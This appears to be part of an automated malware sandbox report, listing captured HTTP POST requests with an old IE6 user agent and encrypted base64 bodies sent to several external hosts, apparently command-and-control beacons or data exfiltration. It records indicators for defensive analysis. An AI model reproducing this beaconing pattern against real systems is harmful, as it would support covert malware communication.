                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 48 58 37 32 6a 34 6f 6c 55 32 4e 72 4d 39 7a 70 37 64 63 57 45 30 32 4c 34 56 59 36 58 41 50 72 58 72 67 72 6a 45 42 33 68 47 4c 57 4e 71 4d 74 4f 47 4d 5a 76 46 46 50 6a 67 72 6f 4f 2b 31 32 58 75 52 58 4b 61 69 72 76 59 56 2f 6d 30 64 71 71 47 49 71 6d 70 2b 34 41 43 4c 62 38 30 65 71 70 53 6b 31 38 65 46 6a 53 30 66 47 64 61 49 61 5a 5a 43 45 63 6d 33 73 2b 6f 30 54 53 6c 79 4b 43 6b 67 70 47 41 32 4c 64 4e 65 43 77 55 6f 71 32 4a 47 53 47 31 71 71 63 7a 63 31 39 4d 53 65 6f 6e 31 32 70 76 47 43 37 47 6a 44 6f 6b 66 30 72 63 75 69 61 50 6e 44 38 33 79 77 66 79 48 6d 74 2b 64 79 47 30 42 4a 45 2f 72 2f 47 46 69 6e 6c 6c 32 4b 49 48 70 66 65 47 6c 50 41 33 54 43 59 75 30 56 49 72 49 78 66 34 67 4a 77 49 4e 77 50 44 2b 31 64 37 76 67 4f 72 34 4f 61 52 64 61 6c 6b 43 35 4f 58 73 63 47 33 74 7a 68 74 47 64 34 42 34 4c 62 63 75 30 4d 70 46 64 63 79 43 49 64 4e 64 70 4d 4b 47 67 54 7a 32 56 65 44 55 43 36 47 65 70 63 68 59 4c 2b 43 35 4e 79 7a 66 33 2b 39 35 45 50 54 6d 63 33 74 63 7a 4b 53 58 62 31 37 4f 41 31 54 67 58 4f 49 4f 51 65 48 4a 37 36 62 50 50 33 48 72 68 4e 73 53 6a 4b 72 59 48 4c 6a 49 32 43 79 39 6d 70 30 75 44 74 33 49 71 4a 7a 49 63 72 7a 4d 53 43 79 44 67 55 4a 71 69 30 42 35 54 35 34 46 53 63 53 78 30 57 49 37 59 62 72 57 44 73 68 77 33 41 4d 4c 64 76 63 71 68 52 57 62 34 55 61 49 61 74 69 36 33 4d 72 37 5a 6b 74 64 30 6f 4c 52 73 79 33 59 79 74 34 77 4e 38 41 54 4b 2b 71 75 4f 66 64 52 52 6f 69 33 6a 45 30 63 59 6f 77 6e 6c 51 44 6e 77 32 33 6e 41 39 77 42 70 5a 48 56 66 72 4e 65 6f 39 4c 71 34 49 76 41 62 76 79 52 48 2f 52 4f 6a 67 35 2f 51 38 58 50 57 6d 63 32 41 31 44 79 77 6c 49 76 4a 71 39 62 71 75 43 39 32 4a 37 35 31 42 4c 6a 5a 64 31 35 41 46 38 32 75 6c 79 49 45 46 68 62 34 33 4d 53 57 4a 33 66 5a 39 50 35 73 71 6e 35 6f 69 58 77 6c Data Ascii: HX72j4olU2NrM9zp7dcWE02L4VY6XAPrXrgrjEB3hGLWNqMtOGMZvFFPjgroO+12XuRXKairvYV/m0dqqGIqmp+4ACLb80eqpSk18eFjS0fGdaIaZZCEcm3s+o0TSlyKCkgpGA2LdNeCwUoq2JGSG1qqczc19MSeon12pvGC7GjDokf0rcuiaPnD83ywfyHmt+dyG0BJE/r/GFinll2KIHpfeGlPA3TCYu0VIrIxf4gJwINwPD+1d7vgOr4OaRdalkC5OXscG3tzhtGd4B4Lbcu0MpFdcyCIdNdpMKGgTz2VeDUC6GepchYL+C5Nyzf3+95EPTmc3tczKSXb17OA1TgXOIOQeHJ76bPP3HrhNsSjKrYHLjI2Cy9mp0uDt3IqJzIcrzMSCyDgUJqi0B5T54FScSx0WI7YbrWDshw3AMLdvcqhRWb4UaIati63Mr7Zktd0oLRsy3Yyt4wN8ATK+quOfdRRoi3jE0cYownlQDnw23nA9wBpZHVfrNeo9Lq4IvAbvyRH/ROjg5/Q8XPWmc2A1DywlIvJq9bquC92J751BLjZd15AF82ulyIEFhb43MSWJ3fZ9P5sqn5oiXwl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 72 6a 74 4c 6d 52 35 7a 55 32 50 63 57 74 41 7a 61 62 39 33 78 51 48 79 56 62 64 65 53 32 77 35 4d 6a 31 4c 73 57 65 46 4a 31 70 36 72 4d 2b 42 45 4a 69 61 75 4f 4a 57 64 4f 69 41 73 77 33 31 6d 52 65 65 52 30 39 67 68 4c 72 48 68 70 46 67 6c 58 5a 34 2b 4a 46 4f 68 71 55 36 50 66 57 51 47 6f 6a 48 33 30 72 4a 6e 6d 30 41 31 33 37 37 31 30 72 2b 6f 31 4c 72 34 4c 52 58 4e 4f 68 7a 66 79 69 34 4f 2f 6f 38 4c 6f 41 73 4b 4c 56 79 69 48 52 77 49 37 76 32 4c 37 30 4e 7a 4b 38 63 6b 4e 44 2f 46 6a 75 75 73 54 59 51 35 4b 55 52 7a 74 73 30 35 72 4f 38 69 42 63 41 7a 35 70 69 6d 57 33 57 79 37 35 55 72 51 36 4e 47 4e 6a 37 57 32 2f 33 39 74 5a 32 51 64 62 6a 41 7a 37 6b 63 77 34 43 6b 33 33 7a 61 51 6e 73 51 62 47 58 45 6e 31 59 5a 34 42 33 63 47 45 45 72 79 52 6a 67 46 6a 56 43 4a 35 62 42 56 53 55 79 48 52 51 48 56 37 34 4f 62 43 36 57 4a 56 61 41 46 6e 6c 72 75 6a 76 70 30 46 4f 6d 59 35 61 77 62 31 77 45 5a 5a 51 39 64 65 54 42 64 33 6e 46 68 4a 48 4a 74 45 32 7a 61 54 57 4e 6f 32 65 53 4d 46 2f 36 31 33 61 4e 34 36 38 64 56 76 58 38 63 4c 57 37 72 47 52 4e 43 66 64 56 70 51 4f 73 39 57 69 4f 4d 36 4e 4d 32 4d 63 72 35 67 6b 4f 67 6c 49 5a 77 46 55 33 54 4e 48 4b 73 73 33 64 64 75 32 33 58 2b 4b 77 58 47 66 35 4c 43 31 4a 76 77 4b 68 2b 6a 53 4c 54 73 6a 59 41 41 49 30 59 78 48 44 45 4e 39 49 75 4d 79 51 43 79 6c 46 70 4c 44 6f 52 35 38 51 57 6c 73 33 6d 6a 37 7a 69 47 76 2b 56 65 72 63 6a 50 46 35 6b 4b 45 74 2b 76 43 63 4f 4f 47 58 6f 71 4c 2f 42 71 69 53 69 45 2f 59 46 6f 43 61 68 65 67 71 57 34 5a 50 74 6f 75 4f 4a 68 72 63 78 4d 55 52 6a 62 35 36 4c 4d 59 4e 33 56 4e 59 4b 63 5a 71 6a 79 48 51 6c 4d 33 52 46 6f 76 7a 41 31 64 45 39 32 63 33 4e 68 78 34 56 31 68 6c 45 47 65 70 58 56 77 78 66 34 76 4a 72 44 42 78 2b 70 49 77 6a 62 65 66 6e 42 31 55 63 34 58 Data Ascii: rjtLmR5zU2PcWtAzab93xQHyVbdeS2w5Mj1LsWeFJ1p6rM+BEJiauOJWdOiAsw31mReeR09ghLrHhpFglXZ4+JFOhqU6PfWQGojH30rJnm0A137710r+o1Lr4LRXNOhzfyi4O/o8LoAsKLVyiHRwI7v2L70NzK8ckND/FjuusTYQ5KURzts05rO8iBcAz5pimW3Wy75UrQ6NGNj7W2/39tZ2QdbjAz7kcw4Ck33zaQnsQbGXEn1YZ4B3cGEEryRjgFjVCJ5bBVSUyHRQHV74ObC6WJVaAFnlrujvp0FOmY5awb1wEZZQ9deTBd3nFhJHJtE2zaTWNo2eSMF/613aN468dVvX8cLW7rGRNCfdVpQOs9WiOM6NM2Mcr5gkOglIZwFU3TNHKss3ddu23X+KwXGf5LC1JvwKh+jSLTsjYAAI0YxHDEN9IuMyQCylFpLDoR58QWls3mj7ziGv+VercjPF5kKEt+vCcOOGXoqL/BqiSiE/YFoCahegqW4ZPtouOJhrcxMURjb56LMYN3VNYKcZqjyHQlM3RFovzA1dE92c3Nhx4V1hlEGepXVwxf4vJrDBx+pIwjbefnB1Uc4X
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 54 45 79 49 6b 7a 5a 44 55 32 4e 7a 43 68 4a 64 6b 65 47 32 42 4e 6e 74 50 6c 4e 57 57 55 6e 32 79 72 70 4f 75 54 38 6f 41 75 6f 78 53 50 76 78 31 47 4b 46 66 47 48 5a 69 6d 45 4e 6b 61 42 52 72 34 47 4a 53 32 61 4a 4f 39 50 63 66 32 46 6e 39 35 6d 33 68 42 6c 77 62 45 53 46 69 6d 6b 67 50 4e 5a 73 71 37 49 65 74 32 66 6d 30 56 57 52 72 77 45 39 50 68 71 4a 53 76 6a 30 62 46 39 35 49 35 38 4c 47 63 4b 48 59 71 70 54 64 69 64 6d 38 67 78 61 59 5a 7a 73 39 34 63 36 6c 31 4c 79 4c 48 37 58 61 38 5a 4d 65 56 75 4f 34 42 37 6d 42 69 6f 42 6b 69 5a 4e 67 54 59 61 31 4c 57 50 31 66 76 45 69 4e 44 55 45 41 69 6b 4e 67 4c 31 58 79 6a 62 45 51 42 62 45 32 4c 59 63 77 36 4a 32 6e 48 63 30 64 43 73 6d 47 6c 75 37 44 58 33 43 46 47 61 2b 75 71 38 61 64 74 4d 56 51 50 33 2f 48 74 2b 35 4f 6f 4b 73 34 62 76 53 61 46 70 75 4a 6d 46 4a 61 38 46 2f 5a 45 74 4f 59 42 31 76 63 32 61 6f 63 32 49 32 48 5a 53 30 36 2b 49 31 34 6c 34 73 2f 6b 47 4b 63 59 31 31 42 6e 6b 38 4b 46 2b 70 71 31 4b 77 72 78 7a 39 32 74 54 52 4e 43 69 2b 48 78 68 4a 31 58 76 4c 70 31 43 63 71 53 45 59 34 59 4d 43 78 6d 48 55 67 4c 33 2b 6b 57 71 76 77 2b 2f 32 49 73 74 58 36 57 59 56 62 78 54 78 55 6d 65 6b 77 48 64 43 30 53 54 45 72 35 2b 38 45 75 34 70 48 36 67 4f 73 72 33 49 4a 53 53 6c 42 48 6c 79 64 33 78 78 62 69 52 75 52 65 42 50 31 75 4f 4c 65 77 6e 31 78 77 37 43 59 47 49 34 6c 49 77 61 51 59 45 74 35 54 62 39 55 74 62 53 41 44 7a 78 57 48 43 58 6f 4a 63 39 43 6e 6a 49 57 4c 72 37 78 66 54 56 62 6d 58 58 47 79 77 75 44 64 48 6f 6b 46 52 45 4f 6d 57 42 42 6e 58 72 2f 55 6e 44 79 69 4d 35 36 46 42 67 66 7a 63 7a 5a 62 68 61 6d 52 67 37 4b 46 6f 42 77 46 78 64 69 63 2b 30 54 59 2f 49 55 65 2b 36 33 78 76 76 4f 61 41 77 33 55 30 Data Ascii: TEyIkzZDU2NzChJdkeG2BNntPlNWWUn2yrpOuT8oAuoxSPvx1GKFfGHZimENkaBRr4GJS2aJO9Pcf2Fn95m3hBlwbESFimkgPNZsq7Iet2fm0VWRrwE9PhqJSvj0bF95I58LGcKHYqpTdidm8gxaYZzs94c6l1LyLH7Xa8ZMeVuO4B7mBioBkiZNgTYa1LWP1fvEiNDUEAikNgL1XyjbEQBbE2LYcw6J2nHc0dCsmGlu7DX3CFGa+uq8adtMVQP3/Ht+5OoKs4bvSaFpuJmFJa8F/ZEtOYB1vc2aoc2I2HZS06+I14l4s/kGKcY11Bnk8KF+pq1Kwrxz92tTRNCi+HxhJ1XvLp1CcqSEY4YMCxmHUgL3+kWqvw+/2IstX6WYVbxTxUmekwHdC0STEr5+8Eu4pH6gOsr3IJSSlBHlyd3xxbiRuReBP1uOLewn1xw7CYGI4lIwaQYEt5Tb9UtbSADzxWHCXoJc9CnjIWLr7xfTVbmXXGywuDdHokFREOmWBBnXr/UnDyiM56FBgfzczZbhamRg7KFoBwFxdic+0TY/IUe+63xvvOaAw3U0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 4d 68 78 70 70 69 7a 67 55 32 4d 37 6a 2b 4a 38 46 39 31 4f 6c 7a 2f 30 33 76 75 45 51 4f 7a 6f 49 4b 53 50 48 5a 57 75 6d 59 52 31 74 4c 53 4e 70 47 65 6c 41 52 6b 38 54 54 4f 46 76 43 35 72 4b 36 6a 47 79 35 41 70 6e 45 69 48 51 70 70 73 47 2b 63 78 45 58 4f 33 50 41 57 2f 32 51 4e 48 75 46 35 6f 43 70 56 6d 32 78 64 73 35 6f 57 51 75 51 50 68 74 53 48 4d 65 74 48 4d 42 78 78 45 74 30 62 35 33 64 74 77 5a 5a 71 35 5a 6f 36 32 5a 61 37 72 79 64 61 30 56 6e 39 70 33 4a 35 55 4f 6c 37 35 6c 59 38 57 62 44 45 78 55 43 6e 70 6e 48 34 45 4e 71 6a 78 6f 36 4f 78 65 63 48 4d 6c 46 39 78 7a 4b 53 31 51 30 54 72 70 61 38 6b 45 2b 6d 67 71 2b 37 43 65 31 54 58 62 75 6c 36 32 30 68 68 71 78 31 54 75 33 6e 59 62 59 2f 48 4d 6b 76 6a 30 6c 79 2f 44 75 70 6a 4e 35 41 49 5a 55 57 45 31 59 66 50 30 50 65 54 47 44 39 38 43 30 46 78 4f 2f 69 78 65 30 54 4c 4c 31 6a 77 33 59 77 4f 78 4c 42 6d 4d 48 6e 41 48 6e 36 39 70 31 6a 6b 32 41 53 62 59 59 2f 4f 36 74 4d 53 70 50 41 66 6b 73 34 78 38 37 4a 56 54 68 76 47 41 7a 65 61 4b 71 70 67 52 66 61 4f 43 71 59 72 5a 31 7a 6e 43 56 42 35 42 59 6e 30 61 4a 6b 46 33 49 52 31 7a 4c 37 68 41 72 59 41 46 33 62 70 6b 58 72 76 73 78 33 2f 34 34 36 69 78 44 6f 66 39 4f 49 4f 6c 61 62 35 44 76 64 43 62 32 6a 75 4f 56 77 4a 6c 62 2f 39 6f 71 43 6e 4e 47 6f 63 33 75 51 44 2b 65 70 64 61 42 31 43 5a 7a 6b 65 45 51 4e 70 39 6d 75 36 74 67 31 74 74 38 4e 30 34 63 65 71 59 33 76 39 67 31 6e 6c 4b 35 39 53 4b 67 48 36 63 79 6c 32 65 73 76 31 38 78 50 41 6d 78 39 78 45 4f 49 45 70 4c 70 71 72 7a 2f 31 4b 34 36 37 72 44 73 2f 49 52 6f 63 7a 70 68 72 67 56 67 70 67 72 46 71 41 2f 58 4c 54 68 57 44 52 55 73 52 4d 68 66 31 6d 30 39 69 46 49 75 79 71 69 5a 6a 4c 69 36 30 30 44 55 47 69 51 3d 3d Data Ascii: MhxppizgU2M7j+J8F91Olz/03vuEQOzoIKSPHZWumYR1tLSNpGelARk8TTOFvC5rK6jGy5ApnEiHQppsG+cxEXO3PAW/2QNHuF5oCpVm2xds5oWQuQPhtSHMetHMBxxEt0b53dtwZZq5Zo62Za7ryda0Vn9p3J5UOl75lY8WbDExUCnpnH4ENqjxo6OxecHMlF9xzKS1Q0Trpa8kE+mgq+7Ce1TXbul620hhqx1Tu3nYbY/HMkvj0ly/DupjN5AIZUWE1YfP0PeTGD98C0FxO/ixe0TLL1jw3YwOxLBmMHnAHn69p1jk2ASbYY/O6tMSpPAfks4x87JVThvGAzeaKqpgRfaOCqYrZ1znCVB5BYn0aJkF3IR1zL7hArYAF3bpkXrvsx3/446ixDof9OIOlab5DvdCb2juOVwJlb/9oqCnNGoc3uQD+epdaB1CZzkeEQNp9mu6tg1tt8N04ceqY3v9g1nlK59SKgH6cyl2esv18xPAmx9xEOIEpLpqrz/1K467rDs/IRoczphrgVgpgrFqA/XLThWDRUsRMhf1m09iFIuyqiZjLi600DUGiQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 48 58 37 32 6a 34 6f 6c 55 32 4e 72 4d 39 7a 70 37 64 63 57 45 30 32 4c 34 56 59 36 58 41 50 72 58 72 67 72 6a 45 42 33 68 47 4c 57 4e 71 4d 74 4f 47 4d 5a 76 46 46 50 6a 67 72 6f 4f 2b 31 32 58 75 52 58 4b 61 69 72 76 59 56 2f 6d 30 64 71 71 47 49 71 6d 70 2b 34 41 43 4c 62 38 30 65 71 70 53 6b 31 38 65 46 6a 53 30 66 47 64 61 49 61 5a 5a 43 45 63 6d 33 73 2b 6f 30 54 53 6c 79 4b 43 6b 67 70 47 41 32 4c 64 4e 65 43 77 55 6f 71 32 4a 47 53 47 31 71 71 63 7a 63 31 39 4d 53 65 6f 6e 31 32 70 76 47 43 37 47 6a 44 6f 6b 66 30 72 63 75 69 61 50 6e 44 38 33 79 77 66 79 48 6d 74 2b 64 79 47 30 42 4a 45 2f 72 2f 47 46 69 6e 6c 6c 32 4b 49 48 70 66 65 47 6c 50 41 33 54 43 59 75 30 56 49 72 49 78 66 34 67 4a 77 49 4e 77 50 44 2b 31 64 37 76 67 4f 72 34 4f 61 52 64 61 6c 6b 43 35 4f 58 73 63 47 33 74 7a 68 74 47 64 34 42 34 4c 62 63 75 30 4d 70 46 64 63 79 43 49 64 4e 64 70 4d 4b 47 67 54 7a 32 56 65 44 55 43 36 47 65 70 63 68 59 4c 2b 43 35 4e 79 7a 66 33 2b 39 35 45 50 54 6d 63 33 74 63 7a 4b 53 58 62 31 37 4f 41 31 54 67 58 4f 49 4f 51 65 48 4a 37 36 62 50 50 33 48 72 68 4e 73 53 6a 4b 72 59 48 4c 6a 49 32 43 79 39 6d 70 30 75 44 74 33 49 71 4a 7a 49 63 72 7a 4d 53 43 79 44 67 55 4a 71 69 30 42 35 54 35 34 46 53 63 53 78 30 57 49 37 59 62 72 57 44 73 68 77 33 41 4d 4c 64 76 63 71 68 52 57 62 34 55 61 49 61 74 69 36 33 4d 72 37 5a 6b 74 64 30 6f 4c 52 73 79 33 59 79 74 34 77 4e 38 41 54 4b 2b 71 75 4f 66 64 52 52 6f 69 33 6a 45 30 63 59 6f 77 6e 6c 51 44 6e 77 32 33 6e 41 39 77 42 70 5a 48 56 66 72 4e 65 6f 39 4c 71 34 49 76 41 62 76 79 52 48 2f 52 4f 6a 67 35 2f 51 38 58 50 57 6d 63 32 41 31 44 79 77 6c 49 76 4a 71 39 62 71 75 43 39 32 4a 37 35 31 42 4c 6a 5a 64 31 35 41 46 38 32 75 6c 79 49 45 46 68 62 34 33 4d 53 57 4a 33 66 5a 39 50 35 73 71 6e 35 6f 69 58 77 6c Data Ascii: HX72j4olU2NrM9zp7dcWE02L4VY6XAPrXrgrjEB3hGLWNqMtOGMZvFFPjgroO+12XuRXKairvYV/m0dqqGIqmp+4ACLb80eqpSk18eFjS0fGdaIaZZCEcm3s+o0TSlyKCkgpGA2LdNeCwUoq2JGSG1qqczc19MSeon12pvGC7GjDokf0rcuiaPnD83ywfyHmt+dyG0BJE/r/GFinll2KIHpfeGlPA3TCYu0VIrIxf4gJwINwPD+1d7vgOr4OaRdalkC5OXscG3tzhtGd4B4Lbcu0MpFdcyCIdNdpMKGgTz2VeDUC6GepchYL+C5Nyzf3+95EPTmc3tczKSXb17OA1TgXOIOQeHJ76bPP3HrhNsSjKrYHLjI2Cy9mp0uDt3IqJzIcrzMSCyDgUJqi0B5T54FScSx0WI7YbrWDshw3AMLdvcqhRWb4UaIati63Mr7Zktd0oLRsy3Yyt4wN8ATK+quOfdRRoi3jE0cYownlQDnw23nA9wBpZHVfrNeo9Lq4IvAbvyRH/ROjg5/Q8XPWmc2A1DywlIvJq9bquC92J751BLjZd15AF82ulyIEFhb43MSWJ3fZ9P5sqn5oiXwl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 6e 4d 39 61 66 67 46 43 33 4a 74 2b 56 53 37 66 34 4c 4d 44 57 39 6f 56 71 4e 70 2f 41 39 79 6b 78 54 6a 43 37 66 4c 2f 4e 49 42 4a 44 6d 4e 79 64 54 63 50 68 58 4a 73 46 2b 61 36 5a 2f 73 31 77 55 58 70 73 42 45 44 48 75 70 6d 42 2f 69 6e 49 53 34 4c 38 7a 59 62 6d 42 61 58 69 6d 6a 4e 77 53 6a 4d 75 74 4a 5a 56 47 68 53 73 48 79 44 55 41 53 35 41 2f 32 65 4f 42 65 46 48 33 41 46 57 45 6e 54 53 7a 48 54 57 67 77 49 6b 56 31 52 52 57 67 37 6f 77 5a 4b 30 63 6b 6b 73 62 73 65 74 65 56 4d 56 2b 69 51 67 2f 45 66 79 68 57 6c 4c 32 4d 64 6d 5a 49 66 63 37 54 69 6c 75 62 76 34 78 6d 35 4d 43 70 4f 4e 57 51 47 6e 6c 36 37 71 4d 4e 37 2f 32 65 50 4b 6e 35 43 57 64 36 70 66 44 6b 78 43 41 4f 37 6f 7a 45 75 35 5a 51 4b 44 57 71 47 74 58 35 4d 53 31 4c 38 65 6f 35 54 6a 2b 41 57 34 64 41 48 66 43 6b 4e 6e 50 41 2b 4d 51 62 4f 50 67 36 49 6d 67 65 78 62 71 6d 56 67 34 7a 7a 70 61 70 2b 70 49 4b 45 73 50 7a 68 73 49 64 66 6f 7a 41 53 6c 71 52 4f 72 38 53 4c 34 30 4f 6a 57 6d 78 39 45 56 77 4b 46 44 57 57 39 6d 73 57 6e 6c 30 4c 66 46 4d 72 6d 6c 31 71 51 6e 38 4d 4a 44 4a 6b 39 4b 34 53 35 67 37 31 57 43 4f 41 6e 41 49 61 37 59 70 50 70 49 33 33 45 6a 71 79 69 6a 47 78 76 62 53 4a 64 47 52 69 4e 71 70 30 35 7a 4d 6b 65 63 70 66 79 38 30 57 34 79 54 55 37 52 59 2f 45 70 46 30 38 53 6c 4d 48 2b 46 65 51 36 32 46 57 2f 4a 4c 66 37 59 42 63 68 7a 32 32 41 4a 33 56 4f 4a 72 56 47 49 54 47 4d 52 4d 78 47 74 66 48 49 42 65 34 6f 38 4b 5a 6b 44 69 35 75 48 35 34 38 51 74 73 36 79 51 44 57 33 4f 36 67 4f 77 4a 55 48 45 78 4b 65 63 46 39 79 4d 34 6e 79 37 65 6e 62 76 56 34 55 3d Data Ascii: nM9afgFC3Jt+VS7f4LMDW9oVqNp/A9ykxTjC7fL/NIBJDmNydTcPhXJsF+a6Z/s1wUXpsBEDHupmB/inIS4L8zYbmBaXimjNwSjMutJZVGhSsHyDUAS5A/2eOBeFH3AFWEnTSzHTWgwIkV1RRWg7owZK0ckksbseteVMV+iQg/EfyhWlL2MdmZIfc7Tilubv4xm5MCpONWQGnl67qMN7/2ePKn5CWd6pfDkxCAO7ozEu5ZQKDWqGtX5MS1L8eo5Tj+AW4dAHfCkNnPA+MQbOPg6ImgexbqmVg4zzpap+pIKEsPzhsIdfozASlqROr8SL40OjWmx9EVwKFDWW9msWnl0LfFMrml1qQn8MJDJk9K4S5g71WCOAnAIa7YpPpI33EjqyijGxvbSJdGRiNqp05zMkecpfy80W4yTU7RY/EpF08SlMH+FeQ62FW/JLf7YBchz22AJ3VOJrVGITGMRMxGtfHIBe4o8KZkDi5uH548Qts6yQDW3O6gOwJUHExKecF9yM4ny7enbvV4U=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 4b 6f 65 6f 6a 42 49 4b 55 32 50 76 44 6a 34 45 78 61 4a 72 57 52 56 46 73 49 4a 69 37 36 67 4d 5a 75 47 61 50 35 39 4e 39 6f 4b 50 4a 4d 59 67 32 79 67 6f 56 4d 54 75 55 67 6a 79 35 49 50 50 78 7a 6a 75 52 63 37 49 78 51 37 52 53 78 71 76 61 45 62 65 57 50 50 48 78 4e 46 34 54 52 46 31 41 4b 78 37 75 45 38 31 6f 49 50 32 50 6e 31 6e 79 37 34 6a 38 4d 69 48 70 4b 4e 6f 72 4c 6d 72 79 58 7a 63 6d 66 79 46 2f 41 39 33 78 79 45 6d 72 35 58 5a 32 46 41 64 34 79 76 53 55 34 55 65 4a 76 36 6e 49 57 4f 7a 33 64 74 70 4b 79 42 44 53 74 74 42 51 38 39 4d 50 71 64 30 59 47 66 74 39 67 61 44 75 59 31 74 37 53 4d 75 54 6f 45 71 70 58 69 43 6e 5a 41 36 57 71 56 33 79 66 61 78 58 71 77 71 36 50 58 75 35 4f 41 48 70 6a 4f 4a 75 67 47 7a 6c 50 76 39 71 6d 6c 34 6f 73 75 2b 46 70 58 71 66 45 4c 69 66 37 79 44 6b 31 34 37 72 36 5a 52 2b 57 4c 74 44 31 43 43 4a 64 55 42 51 36 36 37 44 39 6e 30 79 46 4d 76 63 54 72 63 76 32 39 52 44 78 2b 4f 4a 70 4f 2b 74 32 38 74 2b 66 37 65 7a 38 68 42 66 59 37 74 74 73 73 76 75 46 6d 51 41 4c 31 4a 74 41 76 6a 6a 2b 59 6f 62 78 6e 43 57 70 2b 79 2b 4b 64 44 65 2b 6b 73 4a 54 6f 7a 58 45 46 6f 47 38 72 34 6d 48 45 68 79 76 68 57 7a 30 32 2f 6f 71 68 70 79 50 42 73 36 6c 39 33 64 63 65 47 4b 66 38 73 31 75 48 54 35 72 50 79 47 45 59 43 37 66 54 2f 31 6b 4e 76 59 32 42 58 64 76 79 42 79 45 48 2f 4d 6d 65 39 32 7a 75 47 77 70 2f 49 4f 75 4f 78 66 72 35 6c 4b 58 2b 48 6c 30 51 41 71 65 53 62 65 6b 51 5a 50 30 79 7a 5a 78 52 65 57 4c 66 34 34 44 34 51 49 34 41 62 66 56 56 68 45 6c 69 51 39 64 36 41 54 30 58 33 76 34 76 49 36 43 74 4a 39 64 6b 45 2f 50 52 56 43 48 38 57 6c 64 79 78 36 73 46 67 35 5a 6c 72 Data Ascii: KoeojBIKU2PvDj4ExaJrWRVFsIJi76gMZuGaP59N9oKPJMYg2ygoVMTuUgjy5IPPxzjuRc7IxQ7RSxqvaEbeWPPHxNF4TRF1AKx7uE81oIP2Pn1ny74j8MiHpKNorLmryXzcmfyF/A93xyEmr5XZ2FAd4yvSU4UeJv6nIWOz3dtpKyBDSttBQ89MPqd0YGft9gaDuY1t7SMuToEqpXiCnZA6WqV3yfaxXqwq6PXu5OAHpjOJugGzlPv9qml4osu+FpXqfELif7yDk147r6ZR+WLtD1CCJdUBQ667D9n0yFMvcTrcv29RDx+OJpO+t28t+f7ez8hBfY7ttssvuFmQAL1JtAvjj+YobxnCWp+y+KdDe+ksJTozXEFoG8r4mHEhyvhWz02/oqhpyPBs6l93dceGKf8s1uHT5rPyGEYC7fT/1kNvY2BXdvyByEH/Mme92zuGwp/IOuOxfr5lKX+Hl0QAqeSbekQZP0yzZxReWLf44D4QI4AbfVVhEliQ9d6AT0X3v4vI6CtJ9dkE/PRVCH8Wldyx6sFg5Zlr
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4f 41 71 38 71 48 76 7a 55 32 4e 51 2b 74 44 77 45 6c 4b 34 67 57 51 62 4a 46 57 42 45 7a 39 73 33 35 78 64 46 6f 6c 5a 30 2f 45 77 38 59 4e 79 6c 38 77 6b 57 62 61 5a 39 6a 2f 43 69 4f 73 6d 49 5a 6c 52 69 48 4a 56 66 2f 46 45 51 42 47 7a 77 43 38 31 63 33 6f 4f 6a 4e 48 68 44 57 30 64 73 6c 64 37 57 50 65 74 48 45 45 5a 34 2b 47 72 35 75 34 79 6c 47 55 37 4c 73 54 64 37 79 6e 71 46 41 74 6e 33 31 79 53 69 4b 55 46 4e 33 33 6d 63 38 45 77 63 4b 57 51 69 41 33 62 35 51 75 41 6c 64 50 45 5a 54 64 33 6d 4c 61 52 6b 6e 54 30 6c 5a 56 6f 42 37 4a 6c 50 63 62 41 41 6c 56 62 53 7a 78 70 51 38 33 67 4a 4b 6e 50 4e 4e 49 67 56 4c 6d 63 72 6d 4c 53 72 74 51 42 63 58 31 63 54 74 2f 77 4c 54 5a 45 62 37 78 46 33 2b 38 30 6e 36 6d 38 41 45 50 35 7a 55 59 7a 54 4b 59 66 37 77 4c 75 65 37 51 6a 4d 34 6c 71 43 6b 35 33 4d 32 44 4f 4e 41 4e 66 5a 5a 78 6f 77 2f 37 6b 54 4b 54 72 55 49 50 35 49 34 63 77 59 4d 66 6c 39 7a 66 61 5a 31 5a 4e 61 56 66 78 72 33 6b 78 73 43 54 4e 42 6e 38 34 79 5a 6c 48 63 46 68 68 71 78 78 2b 49 6e 5a 61 66 74 71 73 77 35 69 43 6c 34 51 67 38 54 5a 44 54 71 6e 55 4e 53 61 58 38 58 50 37 31 55 43 70 70 6f 6c 31 2f 72 70 37 31 64 31 6b 4f 6d 46 56 32 45 79 6b 4c 65 6c 4c 35 79 42 4a 43 47 30 74 57 54 6f 51 58 58 6a 48 52 4e 75 73 70 65 51 46 4b 47 77 50 74 61 74 35 61 56 47 73 7a 69 4b 56 6f 57 65 44 36 59 76 69 77 2b 46 7a 50 43 56 6d 4d 4f 48 59 76 